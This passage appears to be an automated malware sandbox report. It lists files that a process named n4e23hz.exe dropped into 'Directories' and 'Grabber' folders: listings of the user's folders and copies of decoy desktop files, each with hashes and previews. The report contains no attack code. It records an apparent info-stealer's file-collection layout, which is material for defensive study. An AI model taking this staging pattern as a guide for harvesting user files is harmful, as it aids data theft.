Preview:	Desktop\...LTKMYBSEYZ\...MXPXCVPDVN\...NIKHQAIQAU\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...RAYHIWGKDI\...UMMBDNEQBN\....BPMLNOBVSB.png....CURQNKVOIX.mp3....DVWHKMNFNN.xlsx....JSDNGYCOWY.jpg....UMMBDNEQBN.docx....WUTJSCBCFX.pdf...VAMYDFPUND\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....JSDNGYCOWY.mp3....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png...BPMLNOBVSB.png...Cleaner.lnk...CURQNKVOIX.mp3...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...DVWHKMNFNN.xlsx...Excel.lnk...file.exe...HTAGVDFUIE.png...JSDNGYCOWY.jpg...JSDNGYCOWY.mp3...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...UMMBDNEQBN.docx...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WUTJSCBCFX.pdf...YPSIACHYXW.png..

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	851
Entropy (8bit):	5.26491834086623
Encrypted:	false
SSDEEP:	24:MgoeV1LFTNkYQPBhsV/AwO8I+bUmPjMJYZ9ZI5Lcx0AaFY0sM:bjvV/TObmPAeHMGVM
MD5:	26EA3FDC608F3D4F70ED68554CB4B49B
SHA1:	0607C2F1049753F1135DE8668DEB3511F898057E
SHA-256:	4DDF6FE0977CB8B4A7594C4663E8EE5B87B02342854904DA8DFBCD7D2BA79CD8
SHA-512:	BE8F197BFDE2F109B7C002D25ECE292F65B7F8156AFBA1F528D973928E4641BA856D00D3DA23DFF63AF6CA0BF50B4D456D7E06343E1BDAC46631AA5C10864EE3
Malicious:	false
Preview:	Documents\...LTKMYBSEYZ\...MXPXCVPDVN\...My Music\...My Pictures\...My Videos\...NIKHQAIQAU\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...RAYHIWGKDI\...UMMBDNEQBN\....BPMLNOBVSB.png....CURQNKVOIX.mp3....DVWHKMNFNN.xlsx....JSDNGYCOWY.jpg....UMMBDNEQBN.docx....WUTJSCBCFX.pdf...VAMYDFPUND\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....JSDNGYCOWY.mp3....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png...BPMLNOBVSB.png...CAFIJKFHIJ.exe...CURQNKVOIX.mp3...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...DVWHKMNFNN.xlsx...HTAGVDFUIE.png...JSDNGYCOWY.jpg...JSDNGYCOWY.mp3...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...UMMBDNEQBN.docx...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WUTJSCBCFX.pdf...YPSIACHYXW.png..

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.253254012587501
Encrypted:	false
SSDEEP:	6:3tcKPHw5LKIyeWdHsDdjWvfca9caIVT/Dvcx0/4unFEKjr4rmsr7MKOvsk2FNs:aWQ5LKPemHsDdinZ9ZI5/zcx0/4aFEK7
MD5:	7F8BA7AFDA4495E26D2856613A3F0ED8
SHA1:	4E48BB3A46168266169FAEB9BB39895E4AF538A7
SHA-256:	6D87325BFC8EA6826D631D2D651D50A6AEE74890DFCE7FF674B05AB95F5CF2FB
SHA-512:	1ECE36B3ACC8753B7374F7DE930A4938C03E2DBD250A82D2C2EAF3A2AEB809A6E779DE9345D6F6BBED7832EA4B0AF244D130AACFFE7184C51688F5C32F36301E
Malicious:	false
Preview:	Downloads\...BPMLNOBVSB.png...CURQNKVOIX.mp3...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...DVWHKMNFNN.xlsx...HTAGVDFUIE.png...JSDNGYCOWY.jpg...JSDNGYCOWY.mp3...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...UMMBDNEQBN.docx...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WUTJSCBCFX.pdf...YPSIACHYXW.png..

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
